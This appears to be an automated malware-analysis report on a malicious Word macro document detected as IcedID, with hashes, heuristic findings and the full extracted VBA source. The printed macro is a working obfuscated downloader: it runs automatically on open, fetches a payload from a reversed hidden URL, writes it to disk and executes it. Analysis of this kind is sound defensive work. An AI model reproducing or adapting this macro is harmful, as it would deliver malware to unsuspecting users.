Office (OOXML) malware analysis — malicious · f23d4ac976310bc3

MALICIOUS

Office (OOXML)

98.6 KB Created: 2020-10-13 10:37:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-10-16

MD5: e01ce0ceffbd77d3a147f04bf1f24967 SHA-1: 0e4043d3a697e648d66eee569aeeb7ea65aed9e9 SHA-256: f23d4ac976310bc322a41cf41c6ed8c9c8b1802a33f5b4bdeec35af422d9c2ca

230 Risk Score

Heuristics 6

ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set xqWBo = CreateObject("Script" + rvsjD)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	12375 bytes
SHA-256: `5e71660f04a15bc9aff61d2dd012d6130a3c918841602d10f5e21598e242bc1b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "qlBCv" Sub ZoSTL(VWjFm, Optional ByVal MJvtv As String = "c:\programdata\LhkyR.txt", Optional ByVal rvsjD As String = "ing.FileSystemObject") ' Tilt obsequiously placental anaphora intransitive ' Funnel trimmings gated maidservants miserable ' Crooned lazaret germanium ' Frustration expedience ' Interacted shelled ' Deaf earnings ' Piquant mackintoshes ' Stereographic ' Swans ' Billposters marbled lemming ' Ensconced polishing postmistress eigenstates emanate ' Fourteenth prouder heathland waggly ' Chevron conquests raising otherness ' Mansions lending Set xqWBo = CreateObject("Script" + rvsjD) ' Pinups unashamed slider slung modernise ' Dynamited hardest ' Libeller postoperative ' Thermostats barked plagues carbuncles youngish Set qylSM = xqWBo.CreateTextFile(MJvtv) ' Beef oxidant tumbledown hardwoods irritability pianola wagons ' Blunders cluster gain delicious ' Fondest epoch rudely disrepair ' Issues newsreader elk ' Transformative rockers dumpling hopelessly demolisher qylSM.WriteLine VWjFm ' Taverns gentiles swamps ' Environ befoul cardinals ' Baronesses relinquished ' Unbending tarty ' Court mouldings ' Holidaying ' Thirds hustles ignorantly trellis fealty ' Wrung syndicate showier uproots anaesthetic qylSM.Close ' Incidences ' Liabilities auks translator afflicts undisguised ' Misdoing deafer ' Farce ' Doorstep geneticist musketeers regarded ' Sneering listeria cobblestones antiquary ' Concerned porphyry urbanely ' Worms lingered attests spicer dishonest ' Butchered weird microcosm ' Selfinflicted reformist duplicated ' Recto thereon fingermarks unconfirmed ' Manacles chase ' Consider ' Ignoramuses ' Gentlemen diseased ' Squats ' Melanomas infers stirrers ' Factorials efficacious immutable ' Furring ' Culminate microprogram wittering ' Interview alluding sonic ' Diagonal accordingly ' Hyperinflation dew ' Muds smith idolisation ebb parenthetical ' Lulls pampered uncomfortableness permit ' Riffs skinflint occupant blowtorch callgirl ' Raincloud bisons silvering fatted depots ' Transformed questing quadratically ' Greaseproof hazardous biting giggling ' Outmanoeuvred jawbone chemicals unamended ' Womanise misconduct triptych ' Testdrive allurement ' Medal esoterically cowling immersing ' Workspace spiny ' Burners lobster marshiest massing reconstitution ' Wrestlers infrared examination tablets ' Constructing discredited sententiously navigated ' Foramen brayed duffel redneck ' Lesotho ahead exwives pinch grabs fruity End Sub ' Mistranslating addition coping ' Organisation caliph ridge basreliefs improving ' Hyperbolic ' Dismounted prism ' Neon deerstalking conquers damper ' Leggings flameproof Sub AutoOpen() ' Dioptres ' Expressible brisker ' Sucker vivisection ' Venue henchmen cannoning ' Stubble machetes seceding ' Shallot poorer fryers ' Couscous drugged untrusty shined ' Altruistically outraged ' Convects sacraments dublin ' Piratical direct acclimatise ' Epigones windfall ' Exalt ' Overleaf pustule grout scheduled ' Penguins wineglass abutted blubbering supermarkets ' Sightseers ' Coiled repacking ' Fluoresce thirty ' Ultramontane melodic menial ' Emboss agriculturalists myalgic inkiest cigars ' Parodies excursion ' Transgressor skill resided solitude remove ' Sneaking bridging ' Aeons silt maturer ' Crumpet solve hooter orator ' Mobilities relativism perturbed bellows duckboards ' Innovative liaise glisten repopulate officialdom blouse ' Rubbishes censoriousness monotonously ' Stargazing ' Pavlov cagiest memories refractors ' Sphygmomanometer spoiling controverted strayed uninvented ' Striding mists Dim mUZrT As New UqPjU ' Jumper nieces glimmerings stayers ' Syndicalism abyssal ' Slating attempts ' Boasting discontent ferocity VWjFm = mUZrT.BRotJ("MSXML2.serverXMLHTTP") ' Disputable ' Equanimity displayed fruitfulness ' Unaffectedly tabulating ' Rescaled unmerited counterattacks sensitised ' Uncompromising rearward bawdiest ' Graced scarier ZoSTL AzDRk(VWjFm) ' Triangulation crewmen rationed tropes ' Separator iceskate gatekeeper ' Foment crinkle dynamited ' Snappier admired hobo dissenter ' Voyeuristic clanging ' Cards improved ' Throatiest epicentre reopen boundedness ' Whiles apricots forgers squeezed ' Nucleus eyewitnesses international reunified ' Bruiser barnstorming repents orbits ' Additions lion symmetric ' Fateful examined KHQmw IPSxZ(0) + "vr32 c:\programdata\LhkyR.txt", "ws" End Sub Function uvSyV(gUtUq, bzQFz) ' Enviable achieve conifers synchronises ' Bungee outflanked ' Bartering plated households feminism instilling ' Gaffes hutches salaam discrepancies footballs superstore ' Consisted corpuscular ' Circumferences bedridden senegal shoplift roguery ' Bogeyman burst degraded explicate discover ' Enclosing surreys shabbily uvSyV = Split(gUtUq, bzQFz) End Function Attribute VB_Name = "gvXzI" ' Native qualifications headdresses ' Speechless ploughmen toothbrush ' Unbuckled muzzles angel ' Xenophobic avowedly laser detaches nationalism ' Archenemy tweeter hikes previewing ' Dodged Function AzDRk(UITDm) ' Respect torrential ossification ' Banging ' Various tonsure gainsay deems ' Raindrops dreamers downpipes ' Thebes storming ' Dozes ingenious landmarks formated unmentioned ' Tonsillitis bakers bus ' Lone appropriately backbone corporeal AzDRk = StrConv(UITDm, vbUnicode) ' Affidavits paraphrased madrigals cupolas berth ' Homelands prostrating chat ' Badge moo dorsally nullifies ' Bakehouse sauerkraut withdrawing adorably ' Bestows plums cripple neologisms obstacles campanological ' Unpronounceable disintegrates ' Dictum stapler topheavy magnesium ' Coined curving novel undiscovered spectroscope cradles wee End Function ' Converts understatement ' Micrometers reconsiders ' Octagon peoples overspend ' Pterodactyl ' Broccoli Function nEDVs() ' Misanthropic beermat ' Enhances ' Sepulchral severally possibilities transporting ' Paints electromagnetically reflexology diagrammatically ' Haha phosphors cabinet minxes ' Thunderclaps cellars reimposed ' Intrusiveness bestiality defamed ' Informatively callup jewels ' Leniency synovial fervently smothers resilient wonderland ' Upbringing comer ' Leprosy ratifies kitchens ' Disclaimers deactivate kiddie address With ActiveDocument.shapes(1) nEDVs = .AlternativeText End With End Function ' Fascist absurdest insulators ' Emended coo ' Eurydice batched rubidium ' Premiere aquanaut victors quit telegraph ' Essentialism discrediting weaponry wildest Function IPSxZ(oAxhP) ' Holiness complies hardiest baldy byelections ugandan unchallenged ' Relationships morosely streetwalkers assault ' Subtypes ' Organs guilders leeway ' Convulsed citation ' Brunch sling physiology lactate engravers ' Gatehouses singalong principality ' Carbonated entangle deceit teachers ' Alliterated hoverer sabotaged ' Correctness anonymously fastidious ' Kiosks UhXyG = nEDVs() oCphP = uvSyV(UhXyG, "###") gSuZJ = oCphP(oAxhP) IPSxZ = gSuZJ End Function Attribute VB_Name = "UqPjU" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function Reverse(Text) Dim i As Integer Dim StrNew As String Dim strOld As String strOld = Trim(Text) For i = 1 To Len(strOld) StrNew = Mid(strOld, i, 1) & StrNew Next i Reverse = StrNew End Function ' Rakish floodlights midflight ' Scrooges ' Stammers each mystical ' Mackintoshes redemptions brings incredibly ' Ark beforehand ' Twisting rocksolid coalblack who bubbliest Function BRotJ(UjuHE) ' Shadier livened routes ganglionic ' Highwaymen strongmen degrade ' Bluntness enriches specifier ' Glimpsing freedom Dim FqTCS As Object ' Playfully dimples ' Cicero caterpillar masqueraded spinnaker ' Mesozoic blazing sheepishly ' Glaciers unfruitful repudiated ' Bastardy comet caretakers ' Skinny sleigh blushers ' Tallest bravely serpents ombudsmen moored ' Rectifier dilator presentiments dreamers ' Sunless preponderantly vow Set FqTCS = CreateObject(UjuHE) ' Humanoids beachcomber wilful ' Temples descriptively pursuant ' Fee ' Corporate malignant chalet drowses ' Overreact comedians wafts bands ' Ignominy teem ' Nor quadripartite dabs majesty storages ' Permission ' Unmentionable krypton ' Conformation ' Illiquid ' Lemon fussiness gravitation ' Invalidates ignominious ' Brawl despising unenthusiastically ' Eternity roundly ' Lyons quaffed planetoids ' Intuitionist midweek covets ' Filmed trigs asperity sunning ' Oafs apnea bystanders ' Randomised comparable wanted hubcap coached ' Disapprobation scurry emasculated werewolves permanent conceivable ' Mills punished unparodied brunei crammer znECo = IPSxZ(1) ' Oft puppets folders ' Professing alienation legible ebbs ' Patchy tarantula viceroys ' Various lunches ' Amnesties wales befuddling FqTCS.Open "GET", Reverse(znECo), False ' Gauche corroborate studiousness inviolable uninterrupted ' Prosecuted ricksha ' Honeysuckles cheekier metropolitan punchy ' Footnotes reverses smokeless smothered ' Trigonometric bitten ' Lighter glossier prerogative FqTCS.Send ' Palimpsest unsigned ' Carp deadpan ' Grandpas unblocked entree gland ' Anagrammatically stacked charm wavier unbroken ' Lls keenness greasing ' Scrummage marshalled aligning milieu ' Incense miser comfy habitually ' Armaments shorn tossup meringues BRotJ = FqTCS.responsebody End Function Attribute VB_Name = "GgTNR" Sub KHQmw(UrxLK, PpJwG) ' Profanity forges apprentice transgression coachman ' Neurosurgery ' Exclusions product founder babbled ' Revels heartland ' Tripled jamaica mounties ' Irreproachably herd associational ospreys Set OJyfX = CreateObject(PpJwG + "cript.shell") ' Puller purifier ' Actionable dermatologist berk punning ' Perturbation raster ' Clouded putrefy iglu ' Unfertilised adjusted sustain ' Divide backstairs ' Expostulation ' Snare endometrial caseloads dioptre ' Screamer renegotiated conman reeds ' Illness preparing cladding ' Tenacity naturalism doomsday craftier acquits ' Fragrant benefactor buffs ' Pancreatic tatty messaging ' Misogyny merchantman endive misfire hornbeam ' Developments minorities ' Recanting ' Feebleness crossfertilisation ' Populations thorniest explorers irritable ' Partnering disinclination sinuous trumpet ' Woollen leukemia ' Lose conductive inauguration dallas reminiscently ' Metals intending governorships ' Antiquity ' Bigamist ' Enquirers compressibility maimed innumeracy ' Gritted fluttered kinsfolk jiffy detrimentally uncommon ' Placer scolded inevitably percutaneous ' Fluctuation ' Highways matings inverters ' Bloodstained controverted softie ' Therapeutic thrash tritium knocks orca ' Malingering involvements ' Stuffing hocus whirlpool geniality ' Sailed adulteress progeny overdubbing gadding ' Episcopal symphonists fared abroad compilers depicted ' Dday bauxite biochemically ' Peerage sync demobs ' Gladdening strenuously offered ' Spiritualist mingling rhetoric ' Undercut empiricists ' Bathhouse ' Meatpie tugs gratification dukes franchised ' Mags crunches ' Affecting mulled apothecaries mailable throbs ' Tonelessly quarried dock ' Aiming brew exultation ' Relatedness wicketkeeping torsion tunnellers ' Connectors extras manipulation ' Urologist trifle ' Inexcusably ergonomic ' Acceptances religion octopus juicy immerses ' Mandarins proximally emollient downplay ' Bottoms will ' Response nick gigantically expressions fang bits ' Precarious martyrs floorspace impressionistic OJyfX.exec UrxLK ' Quaff ' Offender ' Tittering overtakers naps ' Nunneries shoguns gift nothingness icons ' Thuggish inaudible lustrous quashed End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	46080 bytes
SHA-256: `bb264cef47d824613a963d4cf59ad3b4a51ef8d157e2b963343991013fa04b37`
Detection ClamAV: Doc.Macro.ICEID1020-9781212-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.